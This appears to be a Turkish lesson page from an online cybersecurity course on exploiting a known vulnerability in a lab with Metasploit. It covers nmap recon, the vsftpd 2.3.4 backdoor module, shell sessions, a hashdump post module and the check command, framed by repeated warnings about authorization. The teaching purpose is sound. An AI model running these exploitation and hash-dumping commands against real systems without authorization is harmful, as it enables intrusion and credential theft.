Bilinen Bir Güvenlik Açığını İstismar Etme
Bir laboratuvar ortamında güvenlik açığı bulunan bir hedefe karşı istismar modülü kullanın; oturum çıktısını yorumlayın.
Bilinen Bir Güvenlik Açığını İstismar Etme, CoddyKit'te ücretsiz bir Cyber Security Academy dersidir. Bu, 4 dersinin 2. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Cyber Security Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Cyber Security Academy kursu toplamda 4 dersten oluşur.
Önce Etik ve Yetkilendirme
İstismar yalnızca sahibi olduğunuz veya sınama yapmak için açık ve yazılı yetki aldığınız sistemlere karşı yasaldır. Buradaki tüm örnekler yetkili laboratuvar ortamları içindir. Yetkisiz istismar suç teşkil eder.
Laboratuvar Kurulumu Önerisi
Kasıtlı olarak güvenlik açığı içeren sanal makineler kullanın: Metasploitable2/3, DVWA, VulnHub makineleri veya yasal pratik için HackTheBox/TryHackMe. İmzalı bir kapsam belgesi olmadan üretim sistemlerinde ya da gerçek sistemlerde asla sınama yapmayın.
# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/
# Or use VulnHub
# https://www.vulnhub.com/
# Network: host-only adapter (isolated)İstismar Öncesi Keşif
İstismar etmeden önce her zaman numaralandırma yapın. Bir istismar seçmeden önce hizmetin tam sürümünü, OS'yi ve bağlamı öğrenin. Yanlış sürüm = başarısız istismar veya sistem çökmesi.
sudo nmap -sV -O 192.168.1.100
# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploitDoğru İstismarı Seçme
Hizmet adına ve sürümüne göre arama yapın. Derecesi Mükemmel veya Çok iyi olan modülleri tercih edin. Hedef platformunun ve sürüm aralığının eşleştiğini doğrulamak için info çıktısını okuyun.
msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent
msf6 > info exploit/unix/ftp/vsftpd_234_backdoorİstismarı Yapılandırma ve Çalıştırma
RHOSTS'u (uzak hedef), LHOST'u (ters bağlantılar için IP adresiniz), LPORT'u (dinleyici bağlantı noktası) ayarlayın, bir yük seçin ve ardından çalıştırın. Oturum oluşturulmasını veya hata iletilerini izleyin.
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run
# [*] Command shell session 1 openedSonuçları Yorumlama
Başarılı bir istismar bir oturum açar. Başarısız istismarlar hata iletileri gösterir: bağlantı reddedildi (bağlantı noktası açık değil), istismar başarısız oldu (yanlış sürüm), oturum oluşturulmadı (yük geri bağlanamadı).
# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened
# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was createdBir Oturumla Etkileşim Kurma
İstismardan sonra sessions -i kullanarak oturumla etkileşim kurun. Temel komut kabuğu oturumları bir terminal sağlar; Meterpreter oturumları zengin bir programlama arayüzü sunar.
msf6 > sessions # list all sessions
msf6 > sessions -i 1 # interact with session 1
# Once inside:
id
whoami
ifconfig
uname -aOturumları Arka Plana Alma ve Birden Çok Oturum
Bir oturumu arka plana almak ve msfconsole'a dönmek için Ctrl+Z tuşlarına basın. Böylece birden çok oturumu yönetebilir veya belirli bir oturuma karşı istismar sonrası modülleri çalıştırabilirsiniz.
# Background active session
Ctrl+Z
# List sessions
msf6 > sessions
# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > runDenetleme Komutu
Birçok istismar modülü, hedefi gerçekten istismar etmeden güvenlik açığı bulunup bulunmadığını sınayan bir check komutu uygular. Kullanılabiliyorsa her zaman önce check komutunu çalıştırın.
msf6 exploit(ms17_010_eternalblue) > check
# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.İstismar Güvenilirliğiyle İlgili Hususlar
İstismarlar hizmetleri çökertebilir, uyarıları tetikleyebilir veya günlükler bırakabilir. Üretim değerlendirmelerinde istismarları düşük trafik dönemlerine zamanlayın, bir geri alma planınız olsun ve yıkıcı herhangi bir işlemi çalıştırmadan önce yedeklerin bulunduğunu doğrulayın.
İstismarı Belgeleme
Şunları kaydedin: zaman damgası, hedef IP adresi ve bağlantı noktası, kullanılan istismar modülü, CVE numarası, kullanılan yük, elde edilen oturum ve kanıt (ekran görüntüsü veya terminal çıktısı). Bu, rapor için güvenlik açığının kanıtıdır.
Hızlı Kontrol
Metasploit'teki "check" komutu ne yapar?
Özet: Güvenlik Açıklarını İstismar Etme
Etik istismar açık bir akışı izler: yazılı yetki alın, dikkatli biçimde numaralandırma yapın, eşleşen istismarı seçin, modül bilgilerini okuyun, kullanılabiliyorsa önce check komutunu çalıştırın, yürütün ve her şeyi belgeleyin. Yetki olmadan asla istismar gerçekleştirmeyin; teknik beceri ile etik sınır birbirinden ayrılamaz.
Sıkça Sorulan Sorular
“Bilinen Bir Güvenlik Açığını İstismar Etme” dersi ücretsiz mi?
Evet — “Bilinen Bir Güvenlik Açığını İstismar Etme” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Cyber Security Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Cyber Security Academy kursu toplamda 4 dersten oluşur.
“Bilinen Bir Güvenlik Açığını İstismar Etme” dersinde ne öğreneceğim?
Bir laboratuvar ortamında güvenlik açığı bulunan bir hedefe karşı istismar modülü kullanın; oturum çıktısını yorumlayın. Cyber Security Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.
Cyber Security Academy öğrenmeye başlamak için deneyim gerekli mi?
Önceden deneyim gerekmez. CoddyKit'te Cyber Security Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 2. dersidir.
“Bilinen Bir Güvenlik Açığını İstismar Etme” dersi ne kadar sürer?
Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.
Bu Cyber Security Academy dersinde kod yazıp çalıştırabilir miyim?
Evet. Her Cyber Security Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.
Bu kursun tüm dersleri
- Metasploit Mimarisi ve msfconsole
- Bilinen Bir Güvenlik Açığını İstismar Etme
- Yükler: Aşamalı ve Aşamasız, Meterpreter
- İstismar Sonrası: Pivot ve Kalıcılık